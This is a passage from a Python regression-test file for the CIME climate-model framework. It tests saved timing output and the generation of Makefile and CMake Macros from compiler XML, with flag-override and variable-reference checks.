self.skipTest("Skipping single submit. Only works on sandiatoss3")
# Keep small enough for now that we don't have to worry about load balancing
self._create_test(["--single-submit", "SMS_Ln9_P8.f45_g37_rx1.A", "SMS_Ln9_P8.f19_g16_rx1.A"],
env_changes="unset CIME_GLOBAL_WALLTIME &&")
###############################################################################
class L_TestSaveTimings(TestCreateTestCommon):
###############################################################################
###########################################################################
def simple_test(self, manual_timing=False):
###########################################################################
timing_flag = "" if manual_timing else "--save-timing"
driver = CIME.utils.get_cime_default_driver()
if driver == "mct":
walltime="00:15:00"
else:
walltime="00:30:00"
self._create_test(["SMS_Ln9_P1.f19_g16_rx1.A", timing_flag, "--walltime="+walltime], test_id=self._baseline_name)
statuses = glob.glob("%s/*%s/TestStatus" % (self._testroot, self._baseline_name))
self.assertEqual(len(statuses), 1, msg="Should have had exactly one match, found %s" % statuses)
casedir = os.path.dirname(statuses[0])
with Case(casedir, read_only=True) as case:
lids = get_lids(case)
timing_dir = case.get_value("SAVE_TIMING_DIR")
casename = case.get_value("CASE")
self.assertEqual(len(lids), 1, msg="Expected one LID, found %s" % lids)
if manual_timing:
run_cmd_assert_result(self, "cd %s && %s/save_provenance postrun" % (casedir, TOOLS_DIR))
if CIME.utils.get_model() == "e3sm":
provenance_dirs = glob.glob(os.path.join(timing_dir, "performance_archive", getpass.getuser(), casename, lids[0] + "*"))
self.assertEqual(len(provenance_dirs), 1, msg="provenance dirs were missing")
verify_perms(self, timing_dir)
###########################################################################
def test_save_timings(self):
###########################################################################
self.simple_test()
###########################################################################
def test_save_timings_manual(self):
###########################################################################
self.simple_test(manual_timing=True)
# Machinery for Macros generation tests.
class MockMachines(object):
"""A mock version of the Machines object to simplify testing."""
def __init__(self, name, os_):
"""Store the name."""
self.name = name
self.os = os_
def get_machine_name(self):
"""Return the name we were given."""
return self.name
def get_value(self, var_name):
"""Allow the operating system to be queried."""
assert var_name == "OS", "Build asked for a value not " \
"implemented in the testing infrastructure."
return self.os
def is_valid_compiler(self, _): # pylint:disable=no-self-use
"""Assume all compilers are valid."""
return True
def is_valid_MPIlib(self, _):
"""Assume all MPILIB settings are valid."""
return True
# pragma pylint: disable=unused-argument
def get_default_MPIlib(self, attributes=None):
return "mpich2"
def get_default_compiler(self):
return "intel"
def get_macros(macro_maker, build_xml, build_system):
"""Generate build system ("Macros" file) output from config_compilers XML.
Arguments:
macro_maker - The underlying Build object.
build_xml - A string containing the XML to operate on.
build_system - Either "Makefile" or "CMake", depending on desired output.
The return value is a string containing the build system output.
"""
# The macro writer expects file-like objects as input, so
# we need to wrap the strings in StringIO objects.
xml = six.StringIO(str(build_xml))
output = six.StringIO()
output_format = None
if build_system == "Makefile":
output_format = "make"
elif build_system == "CMake":
output_format = "cmake"
else:
output_format = build_system
macro_maker.write_macros_file(macros_file=output,
output_format=output_format, xml=xml)
return str(output.getvalue())
def _wrap_config_compilers_xml(inner_string):
"""Utility function to create a config_compilers XML string.
Pass this function a string containing <compiler> elements, and it will add
the necessary header/footer to the file.
"""
_xml_template = """<?xml version="1.0" encoding="UTF-8"?>
<config_compilers>
{}
</config_compilers>
"""
return _xml_template.format(inner_string)
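# A minimal usage sketch of the machinery above (hypothetical XML content, kept as a
# comment so nothing runs at import time):
#
#   maker = Compilers(MockMachines("mymachine", "SomeOS"), version=2.0)
#   xml = _wrap_config_compilers_xml("<compiler><FFLAGS><base>-O2</base></FFLAGS></compiler>")
#   makefile_text = get_macros(maker, xml, "Makefile")   # or "CMake"
#
# The resulting string is what the MakefileTester/CMakeTester helpers below feed to
# gmake/cmake in order to query individual variables.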
class MakefileTester(object):
"""Helper class for checking Makefile output.
Public methods:
__init__
query_var
assert_variable_equals
assert_variable_matches
"""
# Note that the following is a Makefile and the echo line must begin with a tab
_makefile_template = """
include Macros
query:
\techo '$({})' > query.out
"""
def __init__(self, parent, make_string):
"""Constructor for Makefile test helper class.
Arguments:
parent - The TestCase object that is using this item.
make_string - Makefile contents to test.
"""
self.parent = parent
self.make_string = make_string
def query_var(self, var_name, env, var):
"""Request the value of a variable in the Makefile, as a string.
Arguments:
var_name - Name of the variable to query.
env - A dict containing extra environment variables to set when calling
make.
var - A dict containing extra make variables to set when calling make.
(The distinction between env and var actually matters only for
CMake, though.)
"""
if env is None:
env = dict()
if var is None:
var = dict()
# Write the Makefile strings to temporary files.
temp_dir = tempfile.mkdtemp()
macros_file_name = os.path.join(temp_dir, "Macros")
makefile_name = os.path.join(temp_dir, "Makefile")
output_name = os.path.join(temp_dir, "query.out")
with open(macros_file_name, "w") as macros_file:
macros_file.write(self.make_string)
with open(makefile_name, "w") as makefile:
makefile.write(self._makefile_template.format(var_name))
environment = os.environ.copy()
environment.update(env)
environment.update(var)
gmake_exe = MACHINE.get_value("GMAKE")
if gmake_exe is None:
gmake_exe = "gmake"
run_cmd_assert_result(self.parent, "%s query --directory=%s 2>&1" % (gmake_exe, temp_dir), env=environment)
with open(output_name, "r") as output:
query_result = output.read().strip()
# Clean up the Makefiles.
shutil.rmtree(temp_dir)
return query_result
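# Hedged example of the mechanism above: if self.make_string contained, say,
# "FFLAGS := -O2", then query_var("FFLAGS", None, None) would write a Macros/Makefile
# pair to a temp dir, run `gmake query`, and return the "-O2" captured in query.out.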
def assert_variable_equals(self, var_name, value, env=None, var=None):
"""Assert that a variable in the Makefile has a given value.
Arguments:
var_name - Name of variable to check.
value - The string that the variable value should be equal to.
env - Optional. Dict of environment variables to set when calling make.
var - Optional. Dict of make variables to set when calling make.
"""
self.parent.assertEqual(self.query_var(var_name, env, var), value)
def assert_variable_matches(self, var_name, regex, env=None, var=None):
"""Assert that a variable in the Makefile matches a regex.
Arguments:
var_name - Name of variable to check.
regex - The regex to match.
env - Optional. Dict of environment variables to set when calling make.
var - Optional. Dict of make variables to set when calling make.
"""
self.parent.assertRegexpMatches(self.query_var(var_name, env, var), regex)
class CMakeTester(object):
"""Helper class for checking CMake output.
Public methods:
__init__
query_var
assert_variable_equals
assert_variable_matches
"""
_cmakelists_template = """
include(./Macros.cmake)
file(WRITE query.out "${{{}}}")
"""
def __init__(self, parent, cmake_string):
"""Constructor for CMake test helper class.
Arguments:
parent - The TestCase object that is using this item.
cmake_string - CMake contents to test.
"""
self.parent = parent
self.cmake_string = cmake_string
def query_var(self, var_name, env, var):
"""Request the value of a variable in Macros.cmake, as a string.
Arguments:
var_name - Name of the variable to query.
env - A dict containing extra environment variables to set when calling
cmake.
var - A dict containing extra CMake variables to set when calling cmake.
"""
if env is None:
env = dict()
if var is None:
var = dict()
# Write the CMake strings to temporary files.
temp_dir = tempfile.mkdtemp()
macros_file_name = os.path.join(temp_dir, "Macros.cmake")
cmakelists_name = os.path.join(temp_dir, "CMakeLists.txt")
output_name = os.path.join(temp_dir, "query.out")
with open(macros_file_name, "w") as macros_file:
for key in var:
macros_file.write("set({} {})\n".format(key, var[key]))
macros_file.write(self.cmake_string)
with open(cmakelists_name, "w") as cmakelists:
cmakelists.write(self._cmakelists_template.format(var_name))
environment = os.environ.copy()
environment.update(env)
os_ = MACHINE.get_value("OS")
# CMake will not work on Cray systems without this flag
if os_ == "CNL":
cmake_args = "-DCMAKE_SYSTEM_NAME=Catamount"
else:
cmake_args = ""
run_cmd_assert_result(self.parent, "cmake %s . 2>&1" % cmake_args, from_dir=temp_dir, env=environment)
with open(output_name, "r") as output:
query_result = output.read().strip()
# Clean up the CMake files.
shutil.rmtree(temp_dir)
return query_result
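# Hedged example of the mechanism above: if self.cmake_string contained, say,
# 'set(FFLAGS "-O2")', then query_var("FFLAGS", None, None) would write Macros.cmake
# plus a tiny CMakeLists.txt, run cmake, and return the "-O2" that cmake wrote into
# query.out via file(WRITE ...).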
def assert_variable_equals(self, var_name, value, env=None, var=None):
"""Assert that a variable in the CMakeLists has a given value.
Arguments:
var_name - Name of variable to check.
value - The string that the variable value should be equal to.
env - Optional. Dict of environment variables to set when calling cmake.
var - Optional. Dict of CMake variables to set when calling cmake.
"""
self.parent.assertEqual(self.query_var(var_name, env, var), value)
def assert_variable_matches(self, var_name, regex, env=None, var=None):
"""Assert that a variable in the CMkeLists matches a regex.
Arguments:
var_name - Name of variable to check.
regex - The regex to match.
env - Optional. Dict of environment variables to set when calling cmake.
var - Optional. Dict of CMake variables to set when calling cmake.
"""
self.parent.assertRegexpMatches(self.query_var(var_name, env, var), regex)
###############################################################################
class G_TestMacrosBasic(unittest.TestCase):
###############################################################################
"""Basic infrastructure tests.
This class contains tests that do not actually depend on the output of the
macro file conversion. This includes basic smoke testing and tests of
error-handling in the routine.
"""
def test_script_is_callable(self):
"""The test script can be called on valid output without dying."""
# This is really more a smoke test of this script than anything else.
maker = Compilers(MockMachines("mymachine", "SomeOS"), version=2.0)
test_xml = _wrap_config_compilers_xml("<compiler><SUPPORTS_CXX>FALSE</SUPPORTS_CXX></compiler>")
get_macros(maker, test_xml, "Makefile")
def test_script_rejects_bad_xml(self):
"""The macro writer rejects input that's not valid XML."""
maker = Compilers(MockMachines("mymachine", "SomeOS"), version=2.0)
with self.assertRaises(ParseError):
get_macros(maker, "This is not valid XML.", "Makefile")
def test_script_rejects_bad_build_system(self):
"""The macro writer rejects a bad build system string."""
maker = Compilers(MockMachines("mymachine", "SomeOS"), version=2.0)
bad_string = "argle-bargle."
with assertRaisesRegex(self,
CIMEError,
"Unrecognized build system provided to write_macros: " + bad_string):
get_macros(maker, "This string is irrelevant.", bad_string)
###############################################################################
class H_TestMakeMacros(unittest.TestCase):
###############################################################################
"""Makefile macros tests.
This class contains tests of the Makefile output of Build.
Aside from the usual setUp and test methods, this class has a utility method
(xml_to_tester) that converts XML input directly to a MakefileTester object.
"""
def setUp(self):
self.test_os = "SomeOS"
self.test_machine = "mymachine"
self.test_compiler = MACHINE.get_default_compiler() if TEST_COMPILER is None else TEST_COMPILER
self.test_mpilib = MACHINE.get_default_MPIlib(attributes={"compiler":self.test_compiler}) if TEST_MPILIB is None else TEST_MPILIB
self._maker = Compilers(MockMachines(self.test_machine, self.test_os), version=2.0)
def xml_to_tester(self, xml_string):
"""Helper that directly converts an XML string to a MakefileTester."""
test_xml = _wrap_config_compilers_xml(xml_string)
return MakefileTester(self, get_macros(self._maker, test_xml, "Makefile"))
def test_generic_item(self):
"""The macro writer can write out a single generic item."""
xml_string = "<compiler><SUPPORTS_CXX>FALSE</SUPPORTS_CXX></compiler>"
tester = self.xml_to_tester(xml_string)
tester.assert_variable_equals("SUPPORTS_CXX", "FALSE")
def test_machine_specific_item(self):
"""The macro writer can pick out a machine-specific item."""
xml1 = """<compiler MACH="{}"><SUPPORTS_CXX>TRUE</SUPPORTS_CXX></compiler>""".format(self.test_machine)
xml2 = """<compiler><SUPPORTS_CXX>FALSE</SUPPORTS_CXX></compiler>"""
tester = self.xml_to_tester(xml1+xml2)
tester.assert_variable_equals("SUPPORTS_CXX", "TRUE")
# Do this a second time, but with elements in the reverse order, to
# ensure that the code is not "cheating" by taking the first match.
tester = self.xml_to_tester(xml2+xml1)
tester.assert_variable_equals("SUPPORTS_CXX", "TRUE")
def test_ignore_non_match(self):
"""The macro writer ignores an entry with the wrong machine name."""
xml1 = """<compiler MACH="bad"><SUPPORTS_CXX>TRUE</SUPPORTS_CXX></compiler>"""
xml2 = """<compiler><SUPPORTS_CXX>FALSE</SUPPORTS_CXX></compiler>"""
tester = self.xml_to_tester(xml1+xml2)
tester.assert_variable_equals("SUPPORTS_CXX", "FALSE")
# Again, double-check that we don't just get lucky with the order.
tester = self.xml_to_tester(xml2+xml1)
tester.assert_variable_equals("SUPPORTS_CXX", "FALSE")
def test_os_specific_item(self):
"""The macro writer can pick out an OS-specific item."""
xml1 = """<compiler OS="{}"><SUPPORTS_CXX>TRUE</SUPPORTS_CXX></compiler>""".format(self.test_os)
xml2 = """<compiler><SUPPORTS_CXX>FALSE</SUPPORTS_CXX></compiler>"""
tester = self.xml_to_tester(xml1+xml2)
tester.assert_variable_equals("SUPPORTS_CXX", "TRUE")
tester = self.xml_to_tester(xml2+xml1)
tester.assert_variable_equals("SUPPORTS_CXX", "TRUE")
def test_mach_other_compiler(self):
"""The macro writer compiler-specific logic works as expected."""
xml1 = """<compiler COMPILER="{}"><CFLAGS><base>a b c</base></CFLAGS></compiler>""".format(self.test_compiler)
xml2 = """<compiler MACH="{}" COMPILER="other"><CFLAGS><base>x y z</base></CFLAGS></compiler>""".format(self.test_machine)
xml3 = """<compiler MACH="{}" COMPILER="{}"><CFLAGS><append>x y z</append></CFLAGS></compiler>""".format(self.test_machine,self.test_compiler)
xml4 = """<compiler MACH="{}" COMPILER="{}"><CFLAGS><base>x y z</base></CFLAGS></compiler>""".format(self.test_machine,self.test_compiler)
tester = self.xml_to_tester(xml1)
tester.assert_variable_equals("CFLAGS", "a b c",var={"COMPILER":self.test_compiler})
tester = self.xml_to_tester(xml1+xml2)
tester.assert_variable_equals("CFLAGS", "a b c",var={"COMPILER":self.test_compiler})
tester = self.xml_to_tester(xml2+xml1)
tester.assert_variable_equals("CFLAGS", "a b c",var={"COMPILER":self.test_compiler})
tester = self.xml_to_tester(xml1+xml3)
tester.assert_variable_equals("CFLAGS", "a b c x y z",var={"COMPILER":self.test_compiler})
tester = self.xml_to_tester(xml1+xml4)
tester.assert_variable_equals("CFLAGS", "x y z",var={"COMPILER":self.test_compiler})
tester = self.xml_to_tester(xml4+xml1)
tester.assert_variable_equals("CFLAGS", "x y z",var={"COMPILER":self.test_compiler})
def test_mach_beats_os(self):
"""The macro writer chooses machine-specific over os-specific matches."""
xml1 = """<compiler OS="{}"><SUPPORTS_CXX>FALSE</SUPPORTS_CXX></compiler>""".format(self.test_os)
xml2 = """<compiler MACH="{}"><SUPPORTS_CXX>TRUE</SUPPORTS_CXX></compiler>""".format(self.test_machine)
tester = self.xml_to_tester(xml1+xml2)
tester.assert_variable_equals("SUPPORTS_CXX", "TRUE")
tester = self.xml_to_tester(xml2+xml1)
tester.assert_variable_equals("SUPPORTS_CXX", "TRUE")
def test_mach_and_os_beats_mach(self):
"""The macro writer chooses the most-specific match possible."""
xml1 = """<compiler MACH="{}"><SUPPORTS_CXX>FALSE</SUPPORTS_CXX></compiler>""".format(self.test_machine)
xml2 = """<compiler MACH="{}" OS="{}"><SUPPORTS_CXX>TRUE</SUPPORTS_CXX></compiler>"""
xml2 = xml2.format(self.test_machine, self.test_os)
tester = self.xml_to_tester(xml1+xml2)
tester.assert_variable_equals("SUPPORTS_CXX", "TRUE")
tester = self.xml_to_tester(xml2+xml1)
tester.assert_variable_equals("SUPPORTS_CXX", "TRUE")
def test_build_time_attribute(self):
"""The macro writer writes conditionals for build-time choices."""
xml1 = """<compiler><MPI_PATH MPILIB="mpich">/path/to/mpich</MPI_PATH></compiler>"""
xml2 = """<compiler><MPI_PATH MPILIB="openmpi">/path/to/openmpi</MPI_PATH></compiler>"""
xml3 = """<compiler><MPI_PATH>/path/to/default</MPI_PATH></compiler>"""
tester = self.xml_to_tester(xml1+xml2+xml3)
tester.assert_variable_equals("MPI_PATH", "/path/to/default")
tester.assert_variable_equals("MPI_PATH", "/path/to/mpich", var={"MPILIB": "mpich"})
tester.assert_variable_equals("MPI_PATH", "/path/to/openmpi", var={"MPILIB": "openmpi"})
tester = self.xml_to_tester(xml3+xml2+xml1)
tester.assert_variable_equals("MPI_PATH", "/path/to/default")
tester.assert_variable_equals("MPI_PATH", "/path/to/mpich", var={"MPILIB": "mpich"})
tester.assert_variable_equals("MPI_PATH", "/path/to/openmpi", var={"MPILIB": "openmpi"})
def test_reject_duplicate_defaults(self):
"""The macro writer dies if given many defaults."""
xml1 = """<compiler><MPI_PATH>/path/to/default</MPI_PATH></compiler>"""
xml2 = """<compiler><MPI_PATH>/path/to/other_default</MPI_PATH></compiler>"""
with assertRaisesRegex(self,
CIMEError,
"Variable MPI_PATH is set ambiguously in config_compilers.xml."):
self.xml_to_tester(xml1+xml2)
def test_reject_duplicates(self):
"""The macro writer dies if given many matches for a given configuration."""
xml1 = """<compiler><MPI_PATH MPILIB="mpich">/path/to/mpich</MPI_PATH></compiler>"""
xml2 = """<compiler><MPI_PATH MPILIB="mpich">/path/to/mpich2</MPI_PATH></compiler>"""
with assertRaisesRegex(self,
CIMEError,
"Variable MPI_PATH is set ambiguously in config_compilers.xml."):
self.xml_to_tester(xml1+xml2)
def test_reject_ambiguous(self):
"""The macro writer dies if given an ambiguous set of matches."""
xml1 = """<compiler><MPI_PATH MPILIB="mpich">/path/to/mpich</MPI_PATH></compiler>"""
xml2 = """<compiler><MPI_PATH DEBUG="FALSE">/path/to/mpi-debug</MPI_PATH></compiler>"""
with assertRaisesRegex(self,
CIMEError,
"Variable MPI_PATH is set ambiguously in config_compilers.xml."):
self.xml_to_tester(xml1+xml2)
def test_compiler_changeable_at_build_time(self):
"""The macro writer writes information for multiple compilers."""
xml1 = """<compiler><SUPPORTS_CXX>FALSE</SUPPORTS_CXX></compiler>"""
xml2 = """<compiler COMPILER="gnu"><SUPPORTS_CXX>TRUE</SUPPORTS_CXX></compiler>"""
tester = self.xml_to_tester(xml1+xml2)
tester.assert_variable_equals("SUPPORTS_CXX", "TRUE", var={"COMPILER": "gnu"})
tester.assert_variable_equals("SUPPORTS_CXX", "FALSE")
def test_base_flags(self):
"""Test that we get "base" compiler flags."""
xml1 = """<compiler><FFLAGS><base>-O2</base></FFLAGS></compiler>"""
tester = self.xml_to_tester(xml1)
tester.assert_variable_equals("FFLAGS", "-O2")
def test_machine_specific_base_flags(self):
"""Test selection among base compiler flag sets based on machine."""
xml1 = """<compiler><FFLAGS><base>-O2</base></FFLAGS></compiler>"""
xml2 = """<compiler MACH="{}"><FFLAGS><base>-O3</base></FFLAGS></compiler>""".format(self.test_machine)
tester = self.xml_to_tester(xml1+xml2)
tester.assert_variable_equals("FFLAGS", "-O3")
def test_build_time_base_flags(self):
"""Test selection of base flags based on build-time attributes."""
xml1 = """<compiler><FFLAGS><base>-O2</base></FFLAGS></compiler>"""
xml2 = """<compiler><FFLAGS><base DEBUG="TRUE">-O3</base></FFLAGS></compiler>"""
tester = self.xml_to_tester(xml1+xml2)
tester.assert_variable_equals("FFLAGS", "-O2")
tester.assert_variable_equals("FFLAGS", "-O3", var={"DEBUG": "TRUE"})
def test_build_time_base_flags_same_parent(self):
"""Test selection of base flags in the same parent element."""
xml1 = """<base>-O2</base>"""
xml2 = """<base DEBUG="TRUE">-O3</base>"""
tester = self.xml_to_tester("<compiler><FFLAGS>"+xml1+xml2+"</FFLAGS></compiler>")
tester.assert_variable_equals("FFLAGS", "-O2")
tester.assert_variable_equals("FFLAGS", "-O3", var={"DEBUG": "TRUE"})
# Check for order independence here, too.
tester = self.xml_to_tester("<compiler><FFLAGS>"+xml2+xml1+"</FFLAGS></compiler>")
tester.assert_variable_equals("FFLAGS", "-O2")
tester.assert_variable_equals("FFLAGS", "-O3", var={"DEBUG": "TRUE"})
def test_append_flags(self):
"""Test appending flags to a list."""
xml1 = """<compiler><FFLAGS><base>-delicious</base></FFLAGS></compiler>"""
xml2 = """<compiler><FFLAGS><append>-cake</append></FFLAGS></compiler>"""
tester = self.xml_to_tester(xml1+xml2)
tester.assert_variable_equals("FFLAGS", "-delicious -cake")
# Order independence, as usual.
tester = self.xml_to_tester(xml2+xml1)
tester.assert_variable_equals("FFLAGS", "-delicious -cake")
def test_machine_specific_append_flags(self):
"""Test appending flags that are either more or less machine-specific."""
xml1 = """<compiler><FFLAGS><append>-delicious</append></FFLAGS></compiler>"""
xml2 = """<compiler MACH="{}"><FFLAGS><append>-cake</append></FFLAGS></compiler>""".format(self.test_machine)
tester = self.xml_to_tester(xml1+xml2)
tester.assert_variable_matches("FFLAGS", "^(-delicious -cake|-cake -delicious)$")
def test_machine_specific_base_keeps_append_flags(self):
"""Test that machine-specific base flags don't override default append flags."""
xml1 = """<compiler><FFLAGS><append>-delicious</append></FFLAGS></compiler>"""
xml2 = """<compiler MACH="{}"><FFLAGS><base>-cake</base></FFLAGS></compiler>""".format(self.test_machine)
tester = self.xml_to_tester(xml1+xml2)
tester.assert_variable_equals("FFLAGS", "-cake -delicious")
tester = self.xml_to_tester(xml2+xml1)
tester.assert_variable_equals("FFLAGS", "-cake -delicious")
def test_machine_specific_base_and_append_flags(self):
"""Test that machine-specific base flags coexist with machine-specific append flags."""
xml1 = """<compiler MACH="{}"><FFLAGS><append>-delicious</append></FFLAGS></compiler>""".format(self.test_machine)
xml2 = """<compiler MACH="{}"><FFLAGS><base>-cake</base></FFLAGS></compiler>""".format(self.test_machine)
tester = self.xml_to_tester(xml1+xml2)
tester.assert_variable_equals("FFLAGS", "-cake -delicious")
tester = self.xml_to_tester(xml2+xml1)
tester.assert_variable_equals("FFLAGS", "-cake -delicious")
def test_append_flags_without_base(self):
"""Test appending flags to a value set before Macros is included."""
xml1 = """<compiler><FFLAGS><append>-cake</append></FFLAGS></compiler>"""
tester = self.xml_to_tester(xml1)
tester.assert_variable_equals("FFLAGS", "-delicious -cake", var={"FFLAGS": "-delicious"})
def test_build_time_append_flags(self):
"""Test build_time selection of compiler flags."""
xml1 = """<compiler><FFLAGS><append>-cake</append></FFLAGS></compiler>"""
xml2 = """<compiler><FFLAGS><append DEBUG="TRUE">-and-pie</append></FFLAGS></compiler>"""
tester = self.xml_to_tester(xml1+xml2)
tester.assert_variable_equals("FFLAGS", "-cake")
tester.assert_variable_matches("FFLAGS", "^(-cake -and-pie|-and-pie -cake)$", var={"DEBUG": "TRUE"})
def test_environment_variable_insertion(self):
"""Test that ENV{..} inserts environment variables."""
# DO it again with $ENV{} style
xml1 = """<compiler><LDFLAGS><append>-L$ENV{NETCDF} -lnetcdf</append></LDFLAGS></compiler>"""
tester = self.xml_to_tester(xml1)
tester.assert_variable_equals("LDFLAGS", "-L/path/to/netcdf -lnetcdf",
env={"NETCDF": "/path/to/netcdf"})
def test_shell_command_insertion(self):
"""Test that $SHELL insert shell command output."""
xml1 = """<compiler><FFLAGS><base>-O$SHELL{echo 2} -fast</base></FFLAGS></compiler>"""
tester = self.xml_to_tester(xml1)
tester.assert_variable_equals("FFLAGS", "-O2 -fast")
def test_multiple_shell_commands(self):
"""Test that more than one $SHELL element can be used."""
xml1 = """<compiler><FFLAGS><base>-O$SHELL{echo 2} -$SHELL{echo fast}</base></FFLAGS></compiler>"""
tester = self.xml_to_tester(xml1)
tester.assert_variable_equals("FFLAGS", "-O2 -fast")
def test_env_and_shell_command(self):
"""Test that $ENV works inside $SHELL elements."""
xml1 = """<compiler><FFLAGS><base>-O$SHELL{echo $ENV{OPT_LEVEL}} -fast</base></FFLAGS></compiler>"""
tester = self.xml_to_tester(xml1)
tester.assert_variable_equals("FFLAGS", "-O2 -fast", env={"OPT_LEVEL": "2"})
def test_config_variable_insertion(self):
"""Test that $VAR insert variables from config_compilers."""
# Construct an absurd chain of references just to sure that we don't
# pass by accident, e.g. outputting things in the right order just due
# to good luck in a hash somewhere.
xml1 = """<MPI_LIB_NAME>stuff-${MPI_PATH}-stuff</MPI_LIB_NAME>"""
xml2 = """<MPI_PATH>${MPICC}</MPI_PATH>"""
xml3 = """<MPICC>${MPICXX}</MPICC>"""
xml4 = """<MPICXX>${MPIFC}</MPICXX>"""
xml5 = """<MPIFC>mpicc</MPIFC>"""
tester = self.xml_to_tester("<compiler>"+xml1+xml2+xml3+xml4+xml5+"</compiler>")
tester.assert_variable_equals("MPI_LIB_NAME", "stuff-mpicc-stuff")
def test_config_reject_self_references(self):
"""Test that $VAR self-references are rejected."""
# This is a special case of the next test, which also checks circular
# references.
xml1 = """<MPI_LIB_NAME>${MPI_LIB_NAME}</MPI_LIB_NAME>"""
err_msg = r".* has bad \$VAR references. Check for circular references or variables that are used in a \$VAR but not actually defined."
with assertRaisesRegex(self,CIMEError, err_msg):
self.xml_to_tester("<compiler>"+xml1+"</compiler>")
def test_config_reject_cyclical_references(self):
"""Test that cyclical $VAR references are rejected."""
xml1 = """<MPI_LIB_NAME>${MPI_PATH}</MPI_LIB_NAME>"""
xml2 = """<MPI_PATH>${MPI_LIB_NAME}</MPI_PATH>"""
err_msg = r".* has bad \$VAR references. Check for circular references or variables that are used in a \$VAR but not actually defined."
with assertRaisesRegex(self,CIMEError, err_msg):
self.xml_to_tester("<compiler>"+xml1+xml2+"</compiler>")
def test_variable_insertion_with_machine_specific_setting(self):
"""Test that machine-specific $VAR dependencies are correct."""
xml1 = """<compiler><MPI_LIB_NAME>something</MPI_LIB_NAME></compiler>"""
xml2 = """<compiler MACH="{}"><MPI_LIB_NAME>$MPI_PATH</MPI_LIB_NAME></compiler>""".format(self.test_machine)
xml3 = """<compiler><MPI_PATH>${MPI_LIB_NAME}</MPI_PATH></compiler>"""
err_msg = r".* has bad \$VAR references. Check for circular references or variables that are used in a \$VAR but not actually defined."
with assertRaisesRegex(self,CIMEError, err_msg):
self.xml_to_tester(xml1+xml2+xml3)
def test_override_with_machine_and_new_attributes(self):
"""Test that overrides with machine-specific settings with added attributes work correctly."""
xml1 = """
<compiler COMPILER="{}">
<SCC>icc</SCC>
<MPICXX>mpicxx</MPICXX>
<MPIFC>mpif90</MPIFC>
<MPICC>mpicc</MPICC>
</compiler>""".format(self.test_compiler)
xml2 = """
<compiler COMPILER="{}" MACH="{}">
<MPICXX>mpifoo</MPICXX>
<MPIFC MPILIB="{}">mpiffoo</MPIFC>
<MPICC MPILIB="NOT_MY_MPI">mpifouc</MPICC>
</compiler>
""".format(self.test_compiler, self.test_machine, self.test_mpilib)
tester = self.xml_to_tester(xml1+xml2)
tester.assert_variable_equals("SCC", "icc", var={"COMPILER":self.test_compiler, "MPILIB":self.test_mpilib})
tester.assert_variable_equals("MPICXX", "mpifoo", var={"COMPILER":self.test_compiler, "MPILIB":self.test_mpilib})
tester.assert_variable_equals("MPIFC", "mpiffoo", var={"COMPILER":self.test_compiler, "MPILIB":self.test_mpilib})
tester.assert_variable_equals("MPICC", "mpicc", var={"COMPILER":self.test_compiler, "MPILIB":self.test_mpilib})
tester = self.xml_to_tester(xml2+xml1)
tester.assert_variable_equals("SCC", "icc", var={"COMPILER":self.test_compiler, "MPILIB":self.test_mpilib})
tester.assert_variable_equals("MPICXX", "mpifoo", var={"COMPILER":self.test_compiler, "MPILIB":self.test_mpilib})
tester.assert_variable_equals("MPIFC", "mpiffoo", var={"COMPILER":self.test_compiler, "MPILIB":self.test_mpilib})
tester.assert_variable_equals("MPICC", "mpicc", var={"COMPILER":self.test_compiler, "MPILIB":self.test_mpilib})
def test_override_with_machine_and_same_attributes(self):
"""Test that machine-specific conditional overrides with the same attribute work correctly."""
xml1 = """
<compiler COMPILER="{}">
<MPIFC MPILIB="{}">mpifc</MPIFC>
</compiler>""".format(self.test_compiler, self.test_mpilib)
xml2 = """
<compiler MACH="{}" COMPILER="{}">
<MPIFC MPILIB="{}">mpif90</MPIFC>
</compiler>
""".format(self.test_machine, self.test_compiler, self.test_mpilib)
tester = self.xml_to_tester(xml1+xml2)
tester.assert_variable_equals("MPIFC", "mpif90", var={"COMPILER":self.test_compiler, "MPILIB":self.test_mpilib})
tester = self.xml_to_tester(xml2+xml1)
tester.assert_variable_equals("MPIFC", "mpif90", var={"COMPILER":self.test_compiler, "MPILIB":self.test_mpilib})
    def test_appends_not_overridden(self):
"""Test that machine-specific base value changes don't interfere with appends."""
xml1="""
<compiler COMPILER="{}">
<FFLAGS>
<base>-base1</base>
<append DEBUG="FALSE">-debug1</append>
</FFLAGS>
</compiler>""".format(self.test_compiler)
xml2="""
<compiler MACH="{}" COMPILER="{}">
<FFLAGS>
<base>-base2</base>
<append DEBUG="TRUE">-debug2</append>
</FFLAGS>
</compiler>""".format(self.test_machine, self.test_compiler)
tester = self.xml_to_tester(xml1+xml2)
tester.assert_variable_equals("FFLAGS", "-base2", var={"COMPILER": self.test_compiler})
tester.assert_variable_equals("FFLAGS", "-base2 -debug2", var={"COMPILER": self.test_compiler, "DEBUG": "TRUE"})
tester.assert_variable_equals("FFLAGS", "-base2 -debug1", var={"COMPILER": self.test_compiler, "DEBUG": "FALSE"})
tester = self.xml_to_tester(xml2+xml1)
tester.assert_variable_equals("FFLAGS", "-base2", var={"COMPILER": self.test_compiler})
tester.assert_variable_equals("FFLAGS", "-base2 -debug2", var={"COMPILER": self.test_compiler, "DEBUG": "TRUE"})
tester.assert_variable_equals("FFLAGS", "-base2 -debug1", var={"COMPILER": self.test_compiler, "DEBUG": "FALSE"})
def test_multilevel_specificity(self):
"""Check that settings with multiple levels of machine-specificity can be resolved."""
xml1="""
<compiler>
<MPIFC DEBUG="FALSE">mpifc</MPIFC>
</compiler>"""
xml2="""
<compiler OS="{}">
<MPIFC MPILIB="{}">mpif03</MPIFC>
</compiler>""".format(self.test_os, self.test_mpilib)
xml3="""
<compiler MACH="{}">
<MPIFC DEBUG="TRUE">mpif90</MPIFC>
</compiler>""".format(self.test_machine)
# To verify order-independence, test every possible ordering of blocks.
testers = []
testers.append(self.xml_to_tester(xml1+xml2+xml3))
testers.append(self.xml_to_tester(xml1+xml3+xml2))
testers.append(self.xml_to_tester(xml2+xml1+xml3))
testers.append(self.xml_to_tester(xml2+xml3+xml1))
testers.append(self.xml_to_tester(xml3+xml1+xml2))
testers.append(self.xml_to_tester(xml3+xml2+xml1))
for tester in testers:
tester.assert_variable_equals("MPIFC", "mpif90", var={"COMPILER": self.test_compiler, "MPILIB": self.test_mpilib, "DEBUG": "TRUE"})
tester.assert_variable_equals("MPIFC", "mpif03", var={"COMPILER": self.test_compiler, "MPILIB": self.test_mpilib, "DEBUG": "FALSE"})
tester.assert_variable_equals("MPIFC", "mpifc", var={"COMPILER": self.test_compiler, "MPILIB": "NON_MATCHING_MPI", "DEBUG": "FALSE"})
def test_remove_dependency_issues(self):
"""Check that overridden settings don't cause inter-variable dependencies."""
